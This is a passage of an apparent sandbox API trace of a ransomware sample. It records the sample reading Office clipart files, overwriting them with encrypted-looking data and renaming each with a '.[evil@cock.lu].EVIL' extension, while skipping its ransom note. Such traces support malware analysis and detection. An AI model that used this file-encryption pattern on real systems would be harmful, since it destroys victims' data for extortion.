[0151.767] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0151.767] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040*, nNumberOfBytesToWrite=0x3040, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x3040, lpOverlapped=0x0) returned 1 [0151.767] CloseHandle (hObject=0x1a8) returned 1 [0151.767] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199609.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0151.767] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0151.767] __uncaught_exception () returned 0x84b1160800 [0151.767] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0151.768] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199609.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0199609.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199609.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0199609.wmf.[evil@cock.lu].evil")) returned 1 [0151.769] ??_V@YAXPEAX@Z () returned 0x1 [0151.772] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199609.WMF", dwFileAttributes=0x200) returned 0 [0151.772] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0151.772] wcsstr (_Str="J0200151.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0151.772] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200151.WMF") returned 69 [0151.772] wcscmp (_String1="J0200151.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0151.772] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0200151.WMF") returned 0x0 [0151.772] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200151.WMF") returned 0x45 [0151.772] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200151.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0200151.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0151.775] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x2004, lpOverlapped=0x0) returned 1 [0151.778] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0151.778] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0151.778] _errno () returned 0x84b1160840 [0151.778] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0151.778] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040*, nNumberOfBytesToWrite=0x2020, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2020, lpOverlapped=0x0) returned 1 [0151.778] CloseHandle (hObject=0x1a8) returned 1 [0151.778] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200151.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0151.778] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0151.778] __uncaught_exception () returned 0x84b1160800 [0151.779] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0151.779] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200151.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0200151.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200151.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0200151.wmf.[evil@cock.lu].evil")) returned 1 [0151.780] ??_V@YAXPEAX@Z () returned 0x1 [0151.783] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200151.WMF", dwFileAttributes=0x200) returned 0 [0151.783] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0151.783] wcsstr (_Str="J0200163.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0151.783] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200163.WMF") returned 69 [0151.783] wcscmp (_String1="J0200163.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0151.783] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0200163.WMF") returned 0x0 [0151.783] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200163.WMF") returned 0x45 [0151.784] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200163.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0200163.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0151.786] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1c0c, lpOverlapped=0x0) returned 1 [0151.789] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0151.789] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0151.789] _errno () returned 0x84b1160840 [0151.789] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0151.789] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040*, nNumberOfBytesToWrite=0x1c20, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1c20, lpOverlapped=0x0) returned 1 [0151.789] CloseHandle (hObject=0x1a8) returned 1 [0151.789] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200163.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0151.790] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0151.790] __uncaught_exception () returned 0x84b1160800 [0151.790] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0151.790] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200163.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0200163.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200163.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0200163.wmf.[evil@cock.lu].evil")) returned 1 [0151.791] ??_V@YAXPEAX@Z () returned 0x1 [0151.794] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200163.WMF", dwFileAttributes=0x200) returned 0 [0151.794] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0151.794] wcsstr (_Str="J0200183.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0151.794] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200183.WMF") returned 69 [0151.794] wcscmp (_String1="J0200183.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0151.794] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0200183.WMF") returned 0x0 [0151.794] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200183.WMF") returned 0x45 [0151.794] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200183.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0200183.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0151.797] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x14c0, lpOverlapped=0x0) returned 1 [0151.799] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0151.799] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0151.799] _errno () returned 0x84b1160840 [0151.799] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0151.799] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040*, nNumberOfBytesToWrite=0x14e0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x14e0, lpOverlapped=0x0) returned 1 [0151.799] CloseHandle (hObject=0x1a8) returned 1 [0151.799] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200183.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0151.800] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0151.800] __uncaught_exception () returned 0x84b1160800 [0151.800] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0151.800] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200183.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0200183.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200183.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0200183.wmf.[evil@cock.lu].evil")) returned 1 [0151.801] ??_V@YAXPEAX@Z () returned 0x1 [0151.803] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200183.WMF", dwFileAttributes=0x200) returned 0 [0151.804] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0151.804] wcsstr (_Str="J0200189.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0151.804] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200189.WMF") returned 69 [0151.804] wcscmp (_String1="J0200189.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0151.804] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0200189.WMF") returned 0x0 [0151.804] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200189.WMF") returned 0x45 [0151.804] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200189.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0200189.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0151.806] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1f7c, lpOverlapped=0x0) returned 1 [0151.808] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0151.808] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0151.808] _errno () returned 0x84b1160840 [0151.808] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0151.808] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040*, nNumberOfBytesToWrite=0x1f80, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1f80, lpOverlapped=0x0) returned 1 [0151.808] CloseHandle (hObject=0x1a8) returned 1 [0151.808] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200189.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0151.809] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0151.809] __uncaught_exception () returned 0x84b1160800 [0151.809] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0151.809] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200189.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0200189.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200189.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0200189.wmf.[evil@cock.lu].evil")) returned 1 [0151.809] ??_V@YAXPEAX@Z () returned 0x1 [0151.812] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200189.WMF", dwFileAttributes=0x200) returned 0 [0151.812] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0151.812] wcsstr (_Str="J0200273.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0151.812] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200273.WMF") returned 69 [0151.812] wcscmp (_String1="J0200273.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0151.812] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0200273.WMF") returned 0x0 [0151.812] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200273.WMF") returned 0x45 [0151.812] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200273.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0200273.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0151.814] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x7a46, lpOverlapped=0x0) returned 1 [0151.817] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0151.817] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0151.817] _errno () returned 0x84b1160840 [0151.817] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0151.817] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040*, nNumberOfBytesToWrite=0x7a60, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x7a60, lpOverlapped=0x0) returned 1 [0151.817] CloseHandle (hObject=0x1a8) returned 1 [0151.817] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200273.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0151.817] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0151.818] __uncaught_exception () returned 0x84b1160800 [0151.818] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0151.818] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200273.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0200273.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200273.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0200273.wmf.[evil@cock.lu].evil")) returned 1 [0151.818] ??_V@YAXPEAX@Z () returned 0x1 [0151.821] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200273.WMF", dwFileAttributes=0x200) returned 0 [0151.821] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0151.821] wcsstr (_Str="J0200279.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0151.821] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200279.WMF") returned 69 [0151.821] wcscmp (_String1="J0200279.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0151.821] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0200279.WMF") returned 0x0 [0151.821] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200279.WMF") returned 0x45 [0151.821] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200279.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0200279.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0151.823] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x4c0a, lpOverlapped=0x0) returned 1 [0151.825] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0151.825] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0151.825] _errno () returned 0x84b1160840 [0151.825] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0151.826] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040*, nNumberOfBytesToWrite=0x4c20, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x4c20, lpOverlapped=0x0) returned 1 [0151.826] CloseHandle (hObject=0x1a8) returned 1 [0151.826] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200279.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0151.826] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0151.826] __uncaught_exception () returned 0x84b1160800 [0151.826] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0151.826] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200279.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0200279.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200279.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0200279.wmf.[evil@cock.lu].evil")) returned 1 [0151.827] ??_V@YAXPEAX@Z () returned 0x1 [0151.830] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200279.WMF", dwFileAttributes=0x200) returned 0 [0151.830] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0151.830] wcsstr (_Str="J0200289.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0151.830] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200289.WMF") returned 69 [0151.830] wcscmp (_String1="J0200289.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0151.830] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0200289.WMF") returned 0x0 [0151.830] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200289.WMF") returned 0x45 [0151.830] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200289.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0200289.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0151.832] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xa0b0, lpOverlapped=0x0) returned 1 [0151.834] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0151.834] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0151.834] _errno () returned 0x84b1160840 [0151.834] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0151.835] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040*, nNumberOfBytesToWrite=0xa0c0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xa0c0, lpOverlapped=0x0) returned 1 [0151.835] CloseHandle (hObject=0x1a8) returned 1 [0151.835] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200289.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0151.835] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0151.835] __uncaught_exception () returned 0x84b1160800 [0151.835] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0151.835] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200289.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0200289.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200289.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0200289.wmf.[evil@cock.lu].evil")) returned 1 [0151.836] ??_V@YAXPEAX@Z () returned 0x1 [0151.839] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200289.WMF", dwFileAttributes=0x200) returned 0 [0151.840] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0151.840] wcsstr (_Str="J0200377.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0151.840] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200377.WMF") returned 69 [0151.840] wcscmp (_String1="J0200377.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0151.840] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0200377.WMF") returned 0x0 [0151.840] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200377.WMF") returned 0x45 [0151.840] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200377.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0200377.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0151.842] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x4f08, lpOverlapped=0x0) returned 1 [0151.844] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0151.844] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0151.844] _errno () returned 0x84b1160840 [0151.844] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0151.844] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040*, nNumberOfBytesToWrite=0x4f20, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x4f20, lpOverlapped=0x0) returned 1 [0151.845] CloseHandle (hObject=0x1a8) returned 1 [0151.845] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft 